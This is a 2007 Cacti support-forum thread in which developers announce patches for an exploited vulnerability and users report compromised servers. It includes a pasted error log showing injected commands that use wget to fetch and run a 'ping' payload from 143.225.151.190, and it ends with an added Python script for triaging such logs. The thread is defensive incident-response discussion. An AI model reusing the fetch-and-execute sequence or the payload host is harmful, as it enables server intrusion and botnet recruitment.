Cacti: official forums and support
All times are UTC - 5 hours




Posted: Wed Jan 03, 2007 4:58 pm
Developer/Forum Admin
Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
Patch will be released this week.

_________________
Tony Roman
Experience is what causes a person to make new mistakes instead of old ones.
There are only 3 ways to complete a project: Good, Fast or Cheap, pick two.
With age comes wisdom, what you choose to do with it determines whether or not you are wise.


Posted: Mon Jan 08, 2007 10:34 am
Developer/Forum Admin
Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
Patches for this issue are now available for the following versions:

0.8.6i
0.8.6h

_________________
Tony Roman


Posted: Tue Jan 09, 2007 3:15 pm
Cacti User
Joined: Tue Feb 10, 2004 9:28 am
Posts: 106
Location: Frisco, TX
Can someone update the main page and maybe post something to Announcements about the available patches?


Posted: Tue Jan 09, 2007 3:18 pm
Joined: Tue Jun 08, 2004 5:34 am
Posts: 26
My site just got hit. It looked like a brute force attack rather than using the link from the "Sites that use Cacti" page. I shall post the web server logs shortly. Luckily I caught it before any damage was done; however I shall be reimaging the server tomorrow.


Posted: Tue Jan 09, 2007 4:04 pm
Joined: Tue Jun 08, 2004 5:34 am
Posts: 26
Please see the log excerpt attached.


Attachments:
File comment: Apache log file
cacti-httpd-access_log.txt [5.95 KiB]

Posted: Tue Jan 09, 2007 4:11 pm
Developer/Forum Admin
Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
That's not the standard exploit.

Um... I will decode later to see what they were attempting to do. Thanks for the log.

_________________
Tony Roman


Posted: Tue Jan 09, 2007 11:59 pm
Joined: Tue Mar 14, 2006 11:13 am
Posts: 11
I think it's the same vulnerability, slightly different code but they're still injecting a command into the SQL database.

The command calls wget to get a ping script which it then calls and wget's some other things. A similar command was used on my machine, except they downloaded two images which were tar balls containing scripts and an httpd that connected my machine to an underworld botnet...


Posted: Wed Jan 10, 2007 4:04 am
Joined: Tue Jun 08, 2004 5:34 am
Posts: 26
These are a couple of files I managed to retrieve in /etc/cron.d/, the exploit managed to start sshd running on [::]:80 and [::]:443.


Attachments:
hack-attempt-cacti.tgz [309.12 KiB]

Posted: Wed Jan 10, 2007 7:21 am
Joined: Thu Aug 31, 2006 2:36 am
Posts: 1
Location: Denmark
I've seen the same, but from another IP.
If I try to convert it - it turns out to something like this.
and the ping file it got from 143.225.151.190

At this moment I'm very glad for SELinux


Attachments:
File comment: ping file from the remote server
ping.txt [731 Bytes]
File comment: converted sql
convert.txt [1.09 KiB]
File comment: apache log
httplog.txt [2.5 KiB]

Posted: Wed Jan 10, 2007 9:34 am
Developer/Forum Admin
Joined: Mon Nov 17, 2003 6:35 pm
Posts: 5904
Location: Michigan, USA
Interesting...

Glad I have a local firewall configured.. :)

_________________
Tony Roman


Posted: Wed Jan 10, 2007 4:49 pm
Developer
Joined: Tue May 14, 2002 5:08 pm
Posts: 14861
Location: MI, USA
Nasty, yet elegant exploit. It's rather scary.

TheWitness

_________________
True understanding begins only when we realize how little we truly understand...

Life is an adventure, let yours begin with Cacti!

Author of MacTrack, Boost, CLog, SpikeKill, Platform RTM, DSStats, maintainer of Spine, lots of unpublished work and most of Cacti's bugs.
_________________
Official Cacti Documentation
Gandalfs Official Debugging Help
Central Plugin Repository
Central Templates Repository


Post subject: Announce mailing list
Posted: Thu Jan 11, 2007 10:29 pm
Joined: Wed Nov 15, 2006 8:07 pm
Posts: 16
Location: Warrington, PA
PLEASE! Someone post this to the announce mailing list. It needs wider attention.

I've just submitted a patch for the FreeBSD port.

_________________
--
Dan Langille - http://www.langille.org/


Posted: Thu Jan 11, 2007 11:41 pm
Developer
Joined: Tue May 14, 2002 5:08 pm
Posts: 14861
Location: MI, USA
Done. Also, if you applied the patch and it broke your timespan selector, then so long as you are not running the Timeshifter from Gandalf, you can apply the following file directly. I will correct the issue.

TheWitness


Attachments:
inc_timespan_selector.zip [1.61 KiB]

Post subject: Security Advisory link
Posted: Fri Jan 12, 2007 9:19 am
Joined: Wed Nov 15, 2006 8:07 pm
Posts: 16
Location: Warrington, PA
See http://secunia.com/advisories/23528/

_________________
--
Dan Langille - http://www.langille.org/


Posted: Sat Jan 13, 2007 11:29 am
Joined: Thu Dec 08, 2005 7:13 pm
Posts: 30
I had the same as Ning.

However, I have the following in my error log:

Code:
--05:54:11--  http://143.225.151.190/libsh/ping.txt
           => `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--05:54:11--  http://143.225.151.190/libsh/ping
           => `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory


Do you think that means nothing was affected? I can't see any evidence of it anyway. I've applied the fix now. There should really be a way to tell everyone about that! Had I not been checking through my error logs I wouldn't have known.
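
A triage sketch for error-log output like the excerpt above, added here as an example and not part of the original thread: it pairs each wget request with whether the file was written or refused, and collects the failed follow-up commands. The function names and the last three sample lines (192.0.2.10) are constructed, and the "saved" line format is assumed to be that of wget builds of the period.

```python
import re

# wget stderr as it shows up in the Apache error log when a command run by
# the web server user invokes it (format as in the excerpt above).
REQUEST = re.compile(r"^--\d{2}:\d{2}:\d{2}--\s+(?P<url>\S+)")
WRITE_FAIL = re.compile(r"^Cannot write to `(?P<file>[^']+)' \((?P<why>[^)]+)\)")
SAVED = re.compile(r"- `(?P<file>[^']+)' saved \[")          # assumed success line
FOLLOW_UP = re.compile(r"^(?:(?:sh|chmod|mv): |Can't open perl script)")

# First eight lines come from the post; the last three are constructed.
SAMPLE = """--05:54:11--  http://143.225.151.190/libsh/ping.txt
           => `ping.txt'
HTTP request sent, awaiting response... 200 OK
ping.txt: Permission denied
Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
sh: curl: command not found
--06:01:02--  http://192.0.2.10/constructed/tool
           => `tool'
06:01:02 (1.20 MB/s) - `tool' saved [15808/15808]
"""

def triage(log_text):
    """Return (downloads, follow_up): one dict per wget request with its
    outcome, plus the shell/perl errors from commands that ran afterwards."""
    downloads, follow_up, current = [], [], None
    for raw in log_text.splitlines():
        line = raw.strip()
        m = REQUEST.match(line)
        if m:
            current = {"url": m.group("url"), "outcome": "unknown", "detail": ""}
            downloads.append(current)
            continue
        if current is not None:
            m = WRITE_FAIL.match(line)
            if m:
                current["outcome"], current["detail"] = "blocked", m.group("why")
                continue
            if SAVED.search(line):
                current["outcome"] = "written"
                continue
        if FOLLOW_UP.search(line):
            follow_up.append(line)
    return downloads, follow_up

def needs_deeper_review(downloads):
    """True when any fetch is not positively shown as refused by the log."""
    return any(d["outcome"] != "blocked" for d in downloads)

if __name__ == "__main__":
    found, errors = triage(SAMPLE)
    for d in found:
        print(d["outcome"], d["url"], d["detail"])
    print("follow-up errors:", len(errors), "review:", needs_deeper_review(found))
```

The result reflects only what the spawned commands wrote to stderr; a request with outcome "unknown" or "written" is the cue to inspect the working directory, /etc/cron.d/ and listening ports as earlier posts in the thread did.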

